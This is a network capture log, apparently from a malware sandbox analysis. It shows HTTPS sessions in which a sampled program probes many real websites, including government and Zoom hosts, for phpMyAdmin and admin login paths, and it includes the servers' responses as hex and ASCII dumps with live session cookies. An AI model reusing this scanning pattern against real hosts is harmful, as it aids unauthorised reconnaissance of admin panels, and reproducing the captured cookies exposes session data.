                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 733 6.13144 18.8563 6.64292C16.4989 6.30193 14.1585 6.30193 11.8336 6.64292C11.6166 6.13144 11.2911 5.48048 11.0276 5C8.79575 5.37198 6.67235 6.03845 4.6869 6.9529C0.672601 12.8736 -0.41235 18.6548 0.130124 24.3585C2.79599 26.2959 5.36889 27.4739 7.89682


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                221192.168.2.6654223.134.125.175443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC190OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: a644e7390d5c8f058211db1c75284620
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC937INData Raw: 39 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 65 75 63 6c 69 64 2d 73 71 75 61 72 65 2f 45 75 63 6c 69 64 53 71 75 61 72 65 2d 52 65 67 75 6c 61 72 2d 57 65 62 53 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1498INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 49 74 61 6c 69 63 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                222192.168.2.66552077.240.114.212443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC173OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC335INHTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:17:28 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache-Coyote/1.1
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1060
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1060INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 30 2e 31 34 20 28 44 65 62 69 61 6e 29 20 2d 20 49 6e 66 6f 72 6d 65 20 64 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.14 (Debian) - Informe de Error</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:wh


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                223192.168.2.665401163.247.44.239443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC185OUTGET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC278INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, private
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC2926INData Raw: 42 36 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 34 30 34 34 36 32 38 2d 31 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: B62<!DOCTYPE html><html lang="es"><head> ... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-4044628-15"></script><script> window.dataLayer = window.dataLayer || []; function g


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                224192.168.2.649645138.197.59.199443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC179OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC501INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=m6ZW6nO9UoY9k-niVSF6oRF4.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/admin/login
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                225192.168.2.665333164.100.213.210443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC201OUTGET /Error/NotFound?aspxerrorpath=/phpmyadmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store,no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                                                                                Server:
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src * data:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.jsdelivr.net https://ajax.googleapis.com www.google-analytics.com www.googletagmanager.com; frame-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' 'unsafe-inline' 'unsafe-eval' www.google-analytics.com; font-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 780
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC591INData Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 64 69 76 3e 20 0d 0a 20 20 20 20 20 20 20 20 3c 62 3e 48 54 54 50 20 34 30 34 2e 20 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 28 6f 72 20 6f 6e 65 20 6f 66 20 69 74 73 20 64 65 70 65 6e 64 65 6e 63 69 65 73 29 20 63 6f 75 6c 64 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta name="viewport" content="width=device-width" /> <title>NotFound</title></head><body> <div> <b>HTTP 404. The resource you are looking for (or one of its dependencies) could
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC189INData Raw: 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 27 23 62 74 6e 42 61 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: s"></script><script type="text/javascript"> $(document).on('click', '#btnBack', function () { history.go(-1); }); </script>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                226192.168.2.649722170.114.52.44432156C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC333OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=qAyyVUMtN.VwwaJ3DSunEJzUejWU4vbQ3oi8vft7Zmk-1707131771-1-AUpaUHNP7XBH7VoYl7WtbTOFNZTDujAHBqvdFHtA2TvZkyao3SyXavbmho30yF0TtYC7avtf6LVm95z/tp5urOI=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1350INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=us04;rid=WEB_5efc3c1fe8ebdeded77308ef76196a0b
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-b7H4SGXRSdeaDkA6nzsmWQ' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1304INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 73 73 69 64 3d 75 73 30 34 5f 63 5f 32 54 73 56 4d 50 78 79 53 41 36 4d 74 43 6b 45 30 5f 66 67 6a 51 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 63 72 65 64 3d 32 44 39 34 35 45 33 35 45 41 42 39 36 32 45 42 39 39 43 30 41 36 43 41 41 37 36 42 46 39 31 43 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 63 74 61 69 64 3d 39 36 63 4a 35 31 78 5a 53 37 2d 47 34 51 36 38 4b 64 72 34 42 51 2e 31 37 30 37 31 33 31 37 37 32 39 34 37 2e 36 38 65 39 65 64 35 32 30 34 30 39 32 32 34 37 31 61 30 35 35 65 39 37 37
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_ssid=us04_c_2TsVMPxySA6MtCkE0_fgjQ; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: cred=2D945E35EAB962EB99C0A6CAA76BF91C; Path=/; Secure; HttpOnlyset-cookie: _zm_ctaid=96cJ51xZS7-G4Q68Kdr4BQ.1707131772947.68e9ed52040922471a055e977
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC632INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 76 69 73 69 74 6f 72 5f 67 75 69 64 3d 30 61 64 63 39 32 63 34 63 38 35 62 34 34 66 30 39 35 34 30 62 39 64 39 34 34 65 31 34 64 62 37 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 34 20 46 65 62 20 32 30 32 35 20 31 31 3a 31 36 3a 31 32 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 0d 0a 78 2d 7a 6d 2d 7a 6f 6e 65 69 64 3a 20 56 41 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_visitor_guid=0adc92c4c85b44f09540b9d944e14db7; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:16:12 GMT; Domain=zoom.us; Path=/; Securex-zm-zoneid: VAcontent-language: en-USCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"ht
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 34 66 36 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 2f 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 23 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 5a 6f 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4f66<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 2c 20 76 69 64 65 6f 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 6f 6e 6c 69 6e 65 20 6d 65 65 74 69 6e 67 73 2c 20 77 65 62 20 6d 65 65 74 69 6e 67 2c 20 76 69 64 65 6f 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 76 69 64 65 6f 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 61 6c 6c 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 2c 20 73 63 72 65 65 6e 20 73 68 61 72 65 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 68 61 72 65 2c 20 6d 6f 62 69 6c 69 74 79 2c 20 6d 6f 62 69 6c 65 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 64 65 73 6b 74 6f 70 20 73 68 61 72 65 2c 20 76 69 64 65 6f 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 67 72 6f 75 70 20 6d 65 73 73 61 67 69 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 6c 75 74 69 6f 6e 20 75 73 65 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 69 6e 20 62 6f 61 72 64 2c 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 68 75 64 64 6c 65 2c 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 72 6f 6f 6d 73 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 65 78 65 63 75 74 69 76 65 20 6f 66 66 69 63 65 73 20 61 6e 64 20 63 6c 61 73 73 72 6f 6f 6d 73 2e 20 46 6f 75 6e 64 65 64 20 69 6e 20 32 30 31 31 2c 20 5a 6f 6f 6d 20 68 65 6c 70 73 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 62 72 69 6e 67 20 74 68 65 69 72 20 74 65 61 6d 73 20 74 6f 67 65 74 68 65 72 20 69 6e 20 61 20 66 72 69 63 74 69 6f 6e 6c 65 73 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 74 6f 20 67 65 74 20 6d 6f 72 65 20 64 6f 6e 65 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done.
